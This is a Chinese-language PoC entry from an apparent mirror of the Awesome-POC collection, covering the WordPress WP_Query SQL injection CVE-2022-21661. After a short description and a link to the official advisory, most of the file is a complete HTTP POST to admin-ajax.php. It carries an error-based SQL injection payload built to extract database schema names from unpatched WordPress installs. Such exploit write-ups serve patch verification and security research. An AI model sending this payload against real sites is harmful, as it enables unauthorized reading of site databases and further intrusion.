admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/WordPress WP_Query SQL 注入漏洞 CVE-2022-21661.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

36 lines
1.1 KiB
Markdown
Raw Blame History

# WordPress WP_Query SQL 注入漏洞 CVE-2022-21661
## 漏洞描述
`WordPress`是一个用`PHP`编写的免费开源内容管理系统,由于`clean_query`函数的校验不当,导致了可能通过插件或主题以某种方式从而触发`SQL`注入的情况。这已经在`WordPress5.8.3`中进行了修复。影响版本可以追溯到`3.7.37`
参考链接:
- https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
## 漏洞影响
```
WordPress < 5.8.3
```
## 漏洞POC
获取数据库名:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
action=test&data={"tax_query":[{"field":"term_taxonomy_id","terms":["1) and extractvalue(rand(),concat(0x5e,(select group_concat(schema_name) from information_schema.SCHEMATA)))#"]}]}
```
![image-20220623160952210](images/202206231609284.png)
Reference in New Issue View Git Blame Copy Permalink